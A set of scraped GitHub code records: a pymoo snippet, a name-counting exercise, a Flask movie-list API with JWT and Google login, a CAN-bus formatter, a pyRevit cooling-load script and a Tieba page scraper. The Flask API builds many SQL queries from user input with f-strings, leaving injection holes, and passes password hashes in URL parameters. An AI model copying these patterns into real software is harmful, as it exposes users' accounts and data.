verbose=True)\n\nprint(res.CV[0])\nprint(res.F[0])","repo_name":"AIasd/ADFuzz","sub_path":"pymoo/pymoo/usage/termination/usage_constr_violation.py","file_name":"usage_constr_violation.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"53"} +{"seq_id":"74922932329","text":"test_string = '''\n2\n2\n2\nИванов\nПетров\nСидоров\nИванов\nПетров\nИванов\n'''[1:-1].split('\\n')[::-1]\n\n\ndef input(prompt=''):\n if prompt:\n print(prompt, end='')\n tmp = test_string.pop()\n print(tmp)\n return tmp\n\npeople = set()\npause = set()\nn = int(input())\nm = int(input())\nk = int(input())\ncout = 0\nfor i in range(n + m + k):\n name = input()\n if name in people:\n cout += 1\n pause.add(name)\n people.add(name)\nif (n == k == m) and len(people) == n:\n print('NO')\nelse:\n if len(pause) + cout > 0:\n if ((len(pause) + cout) % 2 != 0):\n print((len(pause) + cout) % 2)\n else:\n print((len(pause) + cout) // 2)\n else:\n print('NO')","repo_name":"tr1ma1d/2BlockPythonTask","sub_path":"213_Languages2.py","file_name":"213_Languages2.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22083868365","text":"from authlib.integrations.flask_client import OAuth\nfrom dotenv import load_dotenv\nfrom apscheduler.schedulers.background import BackgroundScheduler\nfrom Controle.classConexao import Conexao\nfrom Controle.func import verificaSenha\nload_dotenv()\nimport os\nimport requests\nfrom flask import Flask, jsonify, request, redirect, url_for\nfrom flask_cors import CORS, cross_origin\nfrom psycopg2 import Error\nfrom bcrypt import hashpw, gensalt, checkpw\nfrom datetime import timedelta\nfrom flask_mail import Mail, Message\nfrom flask_jwt_extended import JWTManager, jwt_required, create_access_token, get_jwt_identity, decode_token\n\ntry:\n con = Conexao(host=os.getenv(\"HOST\"), user=os.getenv(\"USER\"), password=os.getenv(\"PASSWORD\"), port=os.getenv(\"PORT\"), database=os.getenv(\"DATABASE\")) \n \n app = Flask(__name__)\n app.config['JWT_SECRET_KEY'] = os.getenv(\"KEY\")\n app.config['JWT_ACCESS_TOKEN_EXPIRES'] = timedelta(days=5)\n app.config['JWT_REFRESH_TOKEN_EXPIRES'] = timedelta(days=5)\n app.secret_key = os.getenv(\"KEYAPP\") \n \n jwt = JWTManager(app)\n \n CORS(app)\n print(\"Conectado\")\n mail = Mail(app)\n oauth = OAuth(app)\n\n \n app.config['MAIL_SERVER'] = 'smtp.office365.com'\n app.config['MAIL_PORT'] = 587\n app.config['MAIL_USERNAME'] = os.getenv(\"MAIL\")\n app.config['MAIL_PASSWORD'] = os.getenv(\"PWD_MAIL\")\n app.config['MAIL_USE_TLS'] = True\n app.config['MAIL_USE_SSL'] = False\n \n mail.init_app(app)\n \n apiUrl = 'https://api-rec.vercel.app'\n recUrl = 'https://rec-eight.vercel.app'\n \n def usersNotVerified():\n sql = \"DELETE FROM verificacao WHERE isvalid = false\"\n con.queryExecute(sql, values=None)\n print('funcionou')\n \n scheduler = BackgroundScheduler()\n scheduler.add_job(usersNotVerified, 'interval', days=1)\n scheduler.start()\n \n google = oauth.register(\n name='google',\n client_id=os.getenv(\"CLIENTID\"),\n client_secret=os.getenv(\"CLIENTSECRET\"),\n access_token_url='https://accounts.google.com/o/oauth2/token',\n access_token_params=None,\n authorize_url='https://accounts.google.com/o/oauth2/auth',\n authorize_params=None,\n api_base_url='https://www.googleapis.com/oauth2/v1/',\n jwks_uri='https://www.googleapis.com/oauth2/v3/certs',\n 
userinfo_endpoint='https://openidconnect.googleapis.com/v1/userinfo', \n client_kwargs={'scope': 'openid email profile'},\n)\n \n @app.route(\"/\")\n def home():\n return \"API https://rec-eight.vercel.app\"\n \n @app.route('/google-login')\n def google_login():\n google = oauth.create_client('google')\n redirect_uri = url_for('authorize', _external=True)\n return google.authorize_redirect(redirect_uri)\n \n @app.route('/authorize')\n def authorize():\n google = oauth.create_client('google')\n token = google.authorize_access_token()\n print(token)\n resp = google.get('userinfo')\n user_info = resp.json()\n email = user_info['email']\n nome = user_info['name'] \n sql = f\"SELECT * FROM usuarios WHERE email = '{email}';\"\n resposta = con.querySelectOne(sql)\n if resposta is None: \n sql = f'''INSERT INTO usuarios (nome, email, senha) SELECT %s, %s, %s WHERE NOT EXISTS (SELECT 1 FROM usuarios WHERE email = %s);'''\n values = (nome, email, nome, email)\n con.queryExecute(sql, values)\n tokenUser = create_access_token(identity=email, expires_delta=timedelta(days=5))\n return jsonify({'status': 'sucess', 'nome': f'{nome}', 'access_token': f'{tokenUser}'})\n else:\n app.config['JWT_ACCESS_TOKEN_EXPIRES'] = timedelta(days=5)\n access_token = create_access_token(identity=resposta[0])\n return jsonify({'status': 'sucess', 'id': f'{resposta[0]}', 'nome': f'{resposta[1]}', 'access_token': f'{access_token}'})\n \n @jwt.expired_token_loader\n @cross_origin()\n def my_expired_token_callback(jwt_header, jwt_payload): \n return redirect(f'{recUrl}/token-expired') \n\n @app.route(\"/usuarios\", methods =['POST']) \n def checarUsuarios():\n try:\n email = request.json['email']\n senha = request.json['senha'].encode('utf-8') \n sql = f\"SELECT * FROM usuarios WHERE email = '{email}'\"\n resposta = con.querySelectOne(sql) \n if(resposta is None):\n return jsonify({'status' : 'fail'})\n else: \n if checkpw(senha, resposta[3].encode('utf-8')): \n app.config['JWT_ACCESS_TOKEN_EXPIRES'] = timedelta(days=5)\n access_token = create_access_token(identity=resposta[0]) \n return jsonify({'status' : 'sucess', 'id': f'{resposta[0]}', 'nome' : f'{resposta[1]}', 'access_token': f'{access_token}'}) \n else:\n return jsonify({'status' : 'fail'})\n except Exception as e:\n return redirect(f'{recUrl}/error404') \n \n @app.route('/atualizarUsuario', methods=['POST'])\n @jwt_required()\n def atualizarUsuario():\n try: \n nome = request.json['nome'] \n senha = request.json['senha'].encode('utf-8')\n id_usuario = get_jwt_identity()\n sql = f\"SELECT senha FROM usuarios WHERE id = {id_usuario}\"\n senhaBanco = con.querySelectOne(sql)[0]\n if checkpw(senha, senhaBanco.encode('utf-8')): \n sql = f\"UPDATE usuarios SET nome=%s WHERE id = %s\"\n values = (nome, id_usuario)\n con.queryExecute(sql, values) \n return jsonify({'status': 'success'})\n else:\n return jsonify({'status': 'fail'})\n except Exception as e:\n return redirect(f'{recUrl}/error404')\n \n @app.route(\"/atualizarSenha\", methods =['POST'])\n @jwt_required()\n def atualizarSenha():\n try: \n senhaAtual = request.json['senhaAtual'].encode('utf-8')\n senha = request.json['senha'].encode('utf-8')\n id_usuario = get_jwt_identity()\n sql = f\"SELECT senha FROM usuarios WHERE id = {id_usuario}\"\n senhaBanco = con.querySelectOne(sql)[0]\n if checkpw(senhaAtual, senhaBanco.encode('utf-8')):\n if verificaSenha(senha.decode('utf-8')): \n salt = gensalt()\n senha = hashpw(senha, salt).decode('utf-8')\n sql = f\"UPDATE usuarios SET senha=%s WHERE id = %s\"\n values = (senha, 
id_usuario)\n con.queryExecute(sql, values)\n return jsonify({'status': 'success'})\n else:\n return jsonify({'status': 'senhaFraca'})\n else:\n return jsonify({'status': 'fail'}) \n except Exception as e:\n return redirect(f'{recUrl}/error404') \n \n \n \n @app.route(\"/inserirUsuario\", methods =['POST']) \n def inserirUsuario():\n try:\n nome = request.json['nome']\n email = request.json['email']\n senha = request.json['senha'] \n sql = f\"SELECT * FROM usuarios WHERE email = '{email}';\"\n resposta = con.querySelectOne(sql) \n if resposta is None:\n if verificaSenha(senha):\n senha = senha.encode('utf-8')\n salt = gensalt()\n senha = hashpw(senha, salt).decode('utf-8')\n return redirect(url_for('enviarEmail', email=email, nome=nome, senha=senha)) \n else:\n return jsonify({'status': 'senhaFraca'})\n else: \n return jsonify({'status': 'fail'})\n except Exception as e:\n return redirect(f'{recUrl}/error404')\n \n @app.route(\"/deletarUsuario\", methods = ['POST'])\n @jwt_required()\n def deletarUsuario():\n try:\n id_usuario = get_jwt_identity()\n senhaUser = request.json['senha'].encode('utf-8')\n sql = f\"SELECT * FROM usuarios WHERE id = '{id_usuario}';\"\n resposta = con.querySelectOne(sql)\n senha = resposta[3].encode('utf-8')\n if checkpw(senhaUser, senha):\n sql = f'''DELETE FROM filmes WHERE id_usuario = '{id_usuario}';\n DELETE FROM series WHERE id_usuario = '{id_usuario}';\n DELETE FROM listadesejo WHERE id_usuario = '{id_usuario}';\n DELETE FROM usuarios WHERE id = '{id_usuario}';'''\n con.queryExecute(sql, values=None) \n return jsonify({'status' : 'sucess'})\n else:\n return jsonify({'status' : 'fail'})\n except Exception as e:\n return redirect(f'{recUrl}/error404')\n \n @app.route(\"/filmes\", methods =['GET' ,'POST'])\n @jwt_required()\n def consultarFilmes():\n try: \n if(request.method == 'GET'):\n id = get_jwt_identity()\n sql = f\"SELECT * FROM filmes WHERE id_usuario = '{id}'\"\n results = con.querySelect(sql) \n return results\n elif(request.method == 'POST'):\n titulo = request.json['titulo']\n id_usuario = get_jwt_identity()\n sql = f\"SELECT * FROM filmes WHERE titulo = '{titulo}' AND id_usuario = '{id_usuario}'\"\n resposta = con.querySelectOne(sql) \n if(resposta is None):\n return jsonify({'status' : 'fail'})\n else:\n return jsonify({'status' : 'sucess'})\n except Exception as e:\n return redirect(f'{recUrl}/error404')\n \n @app.route(\"/inserirFilme\", methods =['POST'])\n @jwt_required()\n def inserirFilme():\n try:\n titulo = request.json['titulo']\n imagem = request.json['imagem']\n nota = request.json['nota']\n tipo = request.json['tipo']\n id_api = request.json['id_api']\n id_usuario = get_jwt_identity()\n sql = f\"INSERT INTO filmes (titulo, imagem, nota, tipo, id_api, id_usuario) SELECT %s, %s, %s, %s, %s, %s WHERE NOT EXISTS (SELECT 1 FROM filmes WHERE titulo = %s AND id_usuario = %s)\"\n values = (titulo, imagem, nota, tipo, id_api, id_usuario, titulo, id_usuario)\n con.queryExecute(sql, values) \n return jsonify({'status': 'sucess'})\n except Exception as e:\n return redirect(f'{recUrl}/error404')\n \n @app.route(\"/removerFilme\", methods = ['POST'])\n @jwt_required()\n def removerFilme():\n try:\n titulo = request.json['titulo']\n id_usuario = get_jwt_identity()\n sql = f\"DELETE FROM filmes WHERE id_usuario = '{id_usuario}' AND titulo = '{titulo}'\"\n con.queryExecute(sql, values=None) \n return jsonify({'status' : 'sucess'})\n except Exception as e:\n return redirect(f'{recUrl}/error404')\n \n @app.route(\"/series\", methods =['GET', 'POST'])\n 
@jwt_required()\n def consultarSeries():\n try: \n if(request.method == 'GET'):\n id = get_jwt_identity()\n sql = f\"SELECT * FROM series WHERE id_usuario = '{id}'\" \n results = con.querySelect(sql)\n return results\n elif(request.method == 'POST'):\n titulo = request.json['titulo']\n id_usuario = get_jwt_identity()\n sql = f\"SELECT * FROM series WHERE titulo = '{titulo}' AND id_usuario = '{id_usuario}'\" \n resposta = con.querySelectOne(sql)\n if(resposta is None):\n return jsonify({'status' : 'fail'})\n else:\n return jsonify({'status' : 'sucess'})\n except Exception as e:\n return redirect(f'{recUrl}/error404')\n \n @app.route(\"/inserirSerie\", methods =['POST'])\n @jwt_required()\n def inserirSerie():\n try:\n titulo = request.json['titulo']\n imagem = request.json['imagem']\n nota = request.json['nota']\n tipo = request.json['tipo']\n id_api = request.json['id_api']\n id_usuario = get_jwt_identity() \n sql = f\"INSERT INTO series (titulo, imagem, nota, tipo, id_api, id_usuario) SELECT %s, %s, %s, %s, %s, %s WHERE NOT EXISTS (SELECT 1 FROM series WHERE titulo = %s AND id_usuario = %s)\"\n values = (titulo, imagem, nota, tipo, id_api, id_usuario, titulo, id_usuario)\n con.queryExecute(sql, values) \n return jsonify({'status': 'sucess'})\n except Exception as e:\n return redirect(f'{recUrl}/error404')\n \n @app.route(\"/removerSerie\", methods = ['POST'])\n @jwt_required()\n def removerSerie():\n try:\n titulo = request.json['titulo']\n id_usuario = get_jwt_identity()\n sql = f\"DELETE FROM series WHERE id_usuario = '{id_usuario}' AND titulo = '{titulo}'\"\n con.queryExecute(sql, values=None) \n return jsonify({'status' : 'sucess'})\n except Exception as e:\n return redirect(f'{recUrl}/error404')\n \n @app.route(\"/listaDesejo\", methods =['GET'])\n @jwt_required()\n def consultarListaDesejo():\n try:\n id = get_jwt_identity()\n sql = f\"SELECT * FROM listadesejo WHERE id_usuario = '{id}'\"\n results = con.querySelect(sql) \n return results\n except Exception as e:\n return redirect(f'{recUrl}/error404')\n \n @app.route(\"/inserirListaDesejo\", methods =['POST'])\n @jwt_required()\n def inserirListaDesejo():\n try:\n titulo = request.json['titulo']\n imagem = request.json['imagem']\n nota = request.json['nota']\n tipo = request.json['tipo']\n id_api = request.json['id_api']\n id_usuario = get_jwt_identity()\n sql = f\"INSERT INTO listadesejo (titulo, imagem, nota, tipo, id_api, id_usuario) SELECT %s, %s, %s, %s, %s, %s WHERE NOT EXISTS (SELECT 1 FROM listadesejo WHERE titulo = %s AND id_usuario = %s)\"\n values = (titulo, imagem, nota, tipo, id_api, id_usuario, titulo, id_usuario)\n con.queryExecute(sql, values) \n return jsonify({'status': 'sucess'})\n except Exception as e:\n return redirect(f'{recUrl}/error404')\n \n @app.route(\"/removerListaDesejo\", methods =['POST'])\n @jwt_required()\n def removerListaDesejo():\n try:\n titulo = request.json['titulo']\n id_usuario = get_jwt_identity() \n sql = f\"DELETE FROM listadesejo WHERE titulo = '{titulo}' AND id_usuario = '{id_usuario}';\"\n con.queryExecute(sql, values=None) \n return jsonify({'status': 'sucess'})\n except Exception as e:\n return redirect(f'{recUrl}/error404')\n \n \n @app.route(\"/confirmarEmail/\", methods =['GET']) \n def confirmarEmail(token):\n try: \n sql = f\"SELECT * FROM verificacao WHERE token = '{token}' AND isValid = 'false';\" \n resposta = con.querySelectOne(sql)\n if(resposta is None):\n return redirect(f'{recUrl}/finalizado')\n else: \n sql = f\"UPDATE verificacao SET isValid=true WHERE token = %s\"\n 
values = (token,)\n con.queryExecute(sql, values)\n sql = f'''INSERT INTO usuarios (nome, email, senha) SELECT %s, %s, %s WHERE NOT EXISTS (SELECT 1 FROM usuarios WHERE email = %s);'''\n values = (resposta[1], resposta[2], resposta[3], resposta[2])\n con.queryExecute(sql, values)\n return redirect(f'{recUrl}/finalizado?q={token}')\n except Exception as e: \n return redirect(f'{recUrl}/token-expired')\n \n @app.route(\"/enviarEmail\", methods =['GET'])\n def enviarEmail():\n try:\n email = request.args.get('email')\n nome = request.args.get('nome')\n senha = request.args.get('senha')\n app.config['JWT_ACCESS_TOKEN_EXPIRES'] = timedelta(minutes=15)\n tokenEmail = create_access_token(identity=email)\n sql = f\"INSERT INTO verificacao (nome, email, senha, token) VALUES (%s, %s, %s, %s);\"\n values = (nome, email, senha, tokenEmail)\n con.queryExecute(sql, values)\n msg = Message('Confirmação de Cadastro', sender='project-rec@outlook.com', recipients=[f'{email}']) \n url = f'{apiUrl}/confirmarEmail/{tokenEmail}' \n msg.html = f''' \n
Confirme seu cadastro através do link abaixo:
\n \n {url}\n '''\n mail.send(msg) \n return jsonify({'status': 'sucess'})\n except Exception as e:\n return redirect(f'{recUrl}/error')\n \n @app.route('/recuperarSenha', methods =['POST'])\n def recuperarSenha():\n try:\n email = request.json['email']\n sql = f\"SELECT * FROM usuarios WHERE email = '{email}'\"\n resposta = con.querySelectOne(sql)\n if (resposta is None):\n return jsonify({'status' : 'fail'})\n else:\n app.config['JWT_ACCESS_TOKEN_EXPIRES'] = timedelta(minutes=15)\n tokenEmail = create_access_token(identity=email) \n msg = Message('Alteração de Senha', sender='project-rec@outlook.com', recipients=[f'{email}'])\n url = f'{apiUrl}/check-token/{tokenEmail}'\n msg.html = f''' \n
Altere sua senha através do link abaixo:
\n \n {url}\n '''\n mail.send(msg)\n return jsonify({'status' : 'sucess'})\n except Exception as e:\n return redirect(f'{recUrl}/error') \n \n @app.route('/check-token/', methods =['GET']) \n def checkToken(token):\n try:\n decoded_token = decode_token(token)\n if decoded_token['type'] == 'access':\n return redirect(f'{recUrl}/novaSenha?q={token}')\n else:\n return redirect(f'{recUrl}/erro404')\n except Exception as e: \n return redirect(f'{recUrl}/token-expired') \n \n @app.route('/novaSenha/', methods =['POST']) \n def alterarSenha(token): \n try: \n tokenConfirm = decode_token(token) \n email = tokenConfirm['sub']\n senha = request.json['senha']\n if verificaSenha(senha):\n senha = senha.encode('utf-8')\n salt = gensalt()\n senha = hashpw(senha, salt).decode('utf-8')\n sql = f\"UPDATE usuarios SET senha = %s WHERE email = %s\"\n values = (senha, email)\n con.queryExecute(sql, values)\n return jsonify({'status' : 'sucess', 'msg' : 'Senha alterada com sucesso!'})\n else:\n return jsonify({'status' : 'senhaFraca'})\n except Exception as e: \n return redirect(f'{recUrl}/token-expired') \n\n if __name__ == '__main__':\n app.run(debug=True)\n\nexcept(Error) as error:\n print(error)\n","repo_name":"jeffbcampos/api-rec","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":17642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10690050520","text":"from PCANBasic import *\r\nfrom ManualRead import *\r\n\r\nm_objPCANBasic = PCANBasic()\r\n\r\n\r\ndef GetDataString(data, msgtype):\r\n \"\"\"\r\n Gets the data of a CAN message as a string\r\n\r\n Parameters:\r\n data = Array of bytes containing the data to parse\r\n msgtype = Type flags of the message the data belong\r\n\r\n Returns:\r\n A string with hexadecimal formatted data bytes of a CAN message\r\n \"\"\"\r\n if (msgtype & PCAN_MESSAGE_RTR.value) == PCAN_MESSAGE_RTR.value:\r\n return \"Remote Request\"\r\n else:\r\n strTemp = b\"\"\r\n for x in data:\r\n strTemp += b'%.2X ' % x\r\n return str(strTemp).replace(\"'\", \"\", 2).replace(\"b\", \"\", 1)\r\n # return strTemp\r\n\r\n\r\ndef GetTimeString(time):\r\n \"\"\"\r\n Gets the string representation of the timestamp of a CAN message, in milliseconds\r\n\r\n Parameters:\r\n time = Timestamp in microseconds\r\n\r\n Returns:\r\n String representing the timestamp in milliseconds\r\n \"\"\"\r\n fTime = time / 1000\r\n return '%.1f' % fTime\r\n\r\n\r\ndef ProcessMessageCan(msg, itstimestamp):\r\n \"\"\"\r\n Processes a received CAN message\r\n \r\n Parameters:\r\n msg = The received PCAN-Basic CAN message\r\n itstimestamp = Timestamp of the message as TPCANTimestamp structure\r\n \"\"\"\r\n microsTimeStamp = itstimestamp.micros + 1000 * itstimestamp.millis + 0x100000000 * 1000 * itstimestamp.millis_overflow\r\n\r\n # print(\"Type: \" + GetTypeString(msg.MSGTYPE))\r\n # print(\"ID: \" + GetIdString(msg.ID, msg.MSGTYPE))\r\n # print(\"Length: \" + str(msg.LEN))\r\n read_time = GetTimeString(microsTimeStamp)\r\n read_data = GetDataString(msg.DATA, msg.MSGTYPE)\r\n\r\n return read_time, read_data\r\n\r\n\r\n'''\r\ndef ReadMessage(self):\r\n \"\"\"\r\n Function for reading CAN messages on normal CAN devices\r\n\r\n Returns:\r\n A TPCANStatus error code\r\n \"\"\"\r\n ## We execute the \"Read\" function of the PCANBasic\r\n stsResult = self.m_objPCANBasic.Read(self.PcanHandle)\r\n\r\n if stsResult[0] == PCAN_ERROR_OK:\r\n ## We show the received message\r\n self.ProcessMessageCan(stsResult[1], stsResult[2])\r\n\r\n 
return stsResult[0]\r\n'''","repo_name":"IshaanSharmaa/PCAN-USB-Monitoring-Recording-for-Battery-Management-System","sub_path":"ProcessMessageCanFunc.py","file_name":"ProcessMessageCanFunc.py","file_ext":"py","file_size_in_byte":2245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27266449264","text":"# coding: utf8\nfrom rpw import revit, DB\nfrom pyrevit import script, forms\nfrom IGF_log import getlog\nfrom IGF_lib import get_value\nfrom IGF_forms import Texteingeben\n\n\n__title__ = \"2.20 Kühllast & Kühlleistung MEP Räume\"\n__doc__ = \"\"\"berechnet Kühllast und Kühlleistung von MEP Räume\n\ninput Parameter:\n--------------------\nIGF_RLT_ZuluftminRaum: Zuluftmengen\n\nIGF_RLT_ZuluftTemperatur: Zulufttemperatur\n\nLIN_BA_OVERFLOW_SUPPLY_AIR_TEMPERATURE: Zulufttemperatur falls IGF_RLT_ZuluftTemperatur nicht eingegeben wird\n\nLIN_BA_DESIGN_COOLING_TEMPERATURE: Raumtemperatur\n\nIGF_K_KühllastLaborRaum: Kühllast Labor Raum\n\nIGF_S_KühllastLaborPWK: Kühllast für Laboreinrichtung über PKW\n\nLIN_BA_CALCULATED_COOLING_LOAD: Kühllast Gebäude\n\nIGF_K_DeS_Leistung: Kühlleistung DeS\n\nIGF_K_ULK_Leistung: Kühlleistung ULK\n\nIGF_K_KA_Leistung: sonstige Kühlleistung\n--------------------\n\noutput Parameter:\n--------------------\nIGF_RLT_ZuluftKühlleistung: Kühlleistung Zuluft, Zuluftfaktor * (Vol_zu * 1000 * 1.2 * 1.006 * (Temp_Raum - Temp_Zu) / 3600)\n\nIGF_K_KühlleistungRaum: Summe von Zuluft- & DeS- & ULK- & Kältekühlleistung\n\nIGF_K_KühllastGesamt: Summe von Kühllast Gebäude und Kühllast Labor Raum\n\nIGF_K_KühlleistungBilanz: gesamte Kühlleistung - gesamte Kühllast\n\nIGF_K_KühlBilanzProzent: gesamte Kühlleistung / gesamte Kühllast\n--------------------\n\n[Version: 1.2]\n[2021.11.18]\n\"\"\"\n__author__ = \"Menghui Zhang\"\n\nlogger = script.get_logger()\noutput = script.get_output()\n\ntry:\n getlog(__title__)\nexcept:\n pass\n\nuidoc = revit.uidoc\ndoc = revit.doc\nname = doc.ProjectInformation.Name\nnumber = doc.ProjectInformation.Number\nactive_view = uidoc.ActiveView\n\n# MEP Räume aus aktueller Ansicht\nspaces_collector = DB.FilteredElementCollector(doc).OfCategory(DB.BuiltInCategory.OST_MEPSpaces).WhereElementIsNotElementType()\nspaces = spaces_collector.ToElementIds()\nspaces_collector.Dispose()\n\nlogger.info(\"{} MEP Räume ausgewählt\".format(len(spaces)))\n\nif not spaces:\n logger.error(\"Keine MEP Räume in aktueller Projekt gefunden\")\n script.exit()\n\nfaktor = Texteingeben(text='0.8',label='Faktor der Zuluftleistung')\nfaktor.Title = __title__\ntry:\n faktor.ShowDialog()\nexcept Exception as e:\n logger.error(e)\n script.exit()\n\nZuluftfaktor = faktor.text.Text\nif Zuluftfaktor.find(','):\n Zuluftfaktor.replace(',','.')\ntry:\n if Zuluftfaktor == '0':\n Zuluftfaktor = 0.8\n Zuluftfaktor = float(Zuluftfaktor)\n \n\nexcept:\n logger.error('Falsche Faktor')\n script.exit()\n\nclass MEPRaum:\n def __init__(self, element_id):\n self.element_id = element_id\n self.element = doc.GetElement(self.element_id)\n self.name = self.get_parameter('Name')\n self.nummer = self.get_parameter('Nummer')\n self.Vol_zu = self.get_parameter('IGF_RLT_ZuluftminRaum')\n self.T_raum = self.get_parameter('LIN_BA_DESIGN_COOLING_TEMPERATURE')\n self.Kuehllast_Labor_Raum = self.get_parameter('IGF_K_KühllastLaborRaum')\n self.Kuehllast_Labor_PWK = self.get_parameter('IGF_S_KühllastLaborPWK')\n self.Kuehllast_Gebaeude = self.get_parameter('LIN_BA_CALCULATED_COOLING_LOAD')\n self.KL_DeS = self.get_parameter('IGF_K_DeS_Leistung')\n 
self.KL_ULK = self.get_parameter('IGF_K_ULK_Leistung')\n self.KL_KA = self.get_parameter('IGF_K_KA_Leistung')\n self.raumtyp = self.element.LookupParameter('Bedingungstyp').AsValueString()\n\n try:\n self.T_zu = self.get_parameter('IGF_RLT_ZuluftTemperatur')\n if self.T_zu == '0' or self.T_zu == None:\n try:\n self.T_zu = self.get_parameter('LIN_BA_OVERFLOW_SUPPLY_AIR_TEMPERATURE')\n except:\n self.T_zu = -273.15\n logger.error('kein Zulufttemperatur eingegeben')\n else:\n pass\n except:\n try:\n self.T_zu = self.get_parameter('LIN_BA_OVERFLOW_SUPPLY_AIR_TEMPERATURE')\n except:\n self.T_zu = -273.15\n logger.error('kein Zulufttemperatur eingegeben')\n\n if self.raumtyp in ['Gekühlt','Beheizt und gekühlt']:\n self.P_zu = self.zuluft_kuelleistung_berechnen()\n else:\n self.P_zu = 0\n\n self.Kuehllast_gesamt = self.KuehllastGesamt_Berechnen()\n self.KL_gesamt = self.KL_gesamt_berechnen()\n self.Prozent = self.Prozent_Berechnen()\n self.KL_Bilanz = self.KL_Bilanz_Berechnen()\n\n\n def Werte_Pruefen(self,wert):\n if not wert:\n wert = 0\n return wert\n\n def get_parameter(self, param_name):\n param = self.element.LookupParameter(param_name)\n if not param:\n logger.error(\n \"Parameter {} konnte nicht gefunden werden\".format(param_name))\n return ''\n return get_value(param)\n\n def zuluft_kuelleistung_berechnen(self):\n Kuelhlleistung = 0\n if self.Vol_zu and self.T_zu > -273.15 and self.T_raum > -273.15:\n Kuelhlleistung = Zuluftfaktor * (self.Vol_zu * 1000 * 1.2 * 1.006 * (self.T_raum - self.T_zu) / 3600)\n return round(Kuelhlleistung, 2)\n \n def KL_gesamt_berechnen(self):\n Kuelhlleistung = 0\n self.KL_DeS = self.Werte_Pruefen(self.KL_DeS)\n self.KL_ULK = self.Werte_Pruefen(self.KL_ULK)\n self.KL_KA = self.Werte_Pruefen(self.KL_KA)\n self.P_zu = self.Werte_Pruefen(self.P_zu)\n\n Kuelhlleistung = self.KL_DeS + self.KL_ULK + self.KL_KA + self.P_zu\n\n return round(Kuelhlleistung, 2)\n\n def KuehllastGesamt_Berechnen(self):\n KuehllastGesamt = 0\n\n try:\n KuehllastGesamt = self.Kuehllast_Gebaeude + self.Kuehllast_Labor_Raum\n except:\n try:\n KuehllastGesamt = self.Kuehllast_Gebaeude + 0.0\n except:\n try:\n KuehllastGesamt = self.Kuehllast_Labor_Raum + 0.0\n except:\n KuehllastGesamt = 0.0\n\n KuehllastGesamt = self.Kuehllast_Gebaeude + self.Kuehllast_Labor_Raum\n\n return KuehllastGesamt\n\n def KL_Bilanz_Berechnen(self):\n\n KL_Bilanz = 0\n KL_Bilanz = float(self.KL_gesamt) - self.Kuehllast_gesamt\n \n return KL_Bilanz\n \n def Prozent_Berechnen(self):\n prozent = 0\n if not self.Kuehllast_gesamt:\n return 0\n\n prozent = float(self.KL_gesamt) / self.Kuehllast_gesamt\n return round(prozent,3)\n \n\n\n def werte_schreiben(self):\n \"\"\"Schreibt die berechneten Werte zurück in das Modell.\"\"\"\n def wert_schreiben(param_name, wert):\n if not wert is None:\n # logger.info(\n # \"{} - {} Werte schreiben ({})\".format(self.nummer, param_name, wert))\n self.element.LookupParameter(\n param_name).SetValueString(str(wert))\n\n wert_schreiben(\"IGF_RLT_ZuluftKühlleistung\", self.P_zu)\n wert_schreiben(\"IGF_K_KühllastGesamt\", self.Kuehllast_gesamt)\n wert_schreiben(\"IGF_K_KühlleistungBilanz\", self.KL_Bilanz)\n wert_schreiben(\"IGF_K_KühlleistungRaum\", self.KL_gesamt)\n self.element.LookupParameter('IGF_K_KühlBilanzProzent').Set(self.Prozent)\n\n\n\nmepraum_liste = []\nwith forms.ProgressBar(title='{value}/{max_value} MEP-Räume',cancellable=True, step=10) as pb:\n for n, space_id in enumerate(spaces):\n if pb.cancelled:\n script.exit()\n\n pb.update_progress(n + 1, len(spaces))\n mepraum = 
MEPRaum(space_id)\n\n mepraum_liste.append(mepraum)\n\n\n# Werte zuückschreiben + Abfrage\nif forms.alert('Berechnete Werte in Modell schreiben?', ok=False, yes=True, no=True):\n with forms.ProgressBar(title='{value}/{max_value} Werte schreiben',cancellable=True, step=10) as pb2:\n t = DB.Transaction(doc)\n t.Start('Werte schreiben')\n\n for n,mepraum in enumerate(mepraum_liste):\n if pb2.cancelled:\n t.RollBack()\n script.exit()\n pb2.update_progress(n+1, len(mepraum_liste))\n mepraum.werte_schreiben()\n t.Commit()","repo_name":"MenghuiZhang/pyIGF","sub_path":"pyIGF.tab/Heizen & Kühlen.panel/s1.stack/Kühlen.pulldown/2.20 Kuehlast&Kuehlleistung.pushbutton/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":8126,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15334706780","text":"#-*- coding:utf-8 -*-\n#http://tieba.baidu.com/f?kw=python&fr=ala0&tpl=5&traceid=\n#http://tieba.baidu.com/f?kw=python&ie=utf-8&pn=50\n#http://tieba.baidu.com/f?kw=python&ie=utf-8&pn=100\n#http://tieba.baidu.com/f?kw=python&ie=utf-8&pn=150\n#Mozilla/5.0 (Windows NT 10.0; …) Gecko/20100101 Firefox/66.0\nimport urllib\nfrom urllib import request\n#import urllib.request\nimport time\n\nheader={\n \"User-Agent\":\"Mozilla/5.0 (Linux; U; An\\\ndroid 8.1.0; zh-cn; BLA-AL00 Build/HUAW\\\nEIBLA-AL00) AppleWebKit/537.36 (KHTML, l\\\nike Gecko) Version/4.0 Chrome/57.0.2987.13\\\n2 MQQBrowser/8.9 Mobile Safari/537.36\"\n}\ndef loadpage(fullurl,filename):\n print(\"正在下载:\",filename)\n req=urllib.request.Request(fullurl,headers=header)\n resp=urllib.request.urlopen(req).read()\n return resp\n\ndef writepage(html,filename):\n print(\"正在保存:\",filename)\n with open(filename,\"wb\") as f:\n f.write(html)\n print(\"--------\")\ndef tiebaSpider(url,begin,end):\n for page in range(begin,end+1):\n pn=(page-1)*50\n fullurl=url+\"&pn=\"+str(pn)\n filename = \"D:\\第\" + str(page) + \"页.html\"\n html=loadpage(fullurl,filename)\n writepage(html,filename)\n\n #print(\"谢谢使用\")\n\n\nif __name__ == '__main__':\n kw=input(\"请输入贴吧名:\")\n begin=int(input(\"请输入你要下载的起始页:\"))\n end=int(input(\"请输入你要下载的末页:\"))\n url=\"http://tieba.baidu.com/f?\"\n 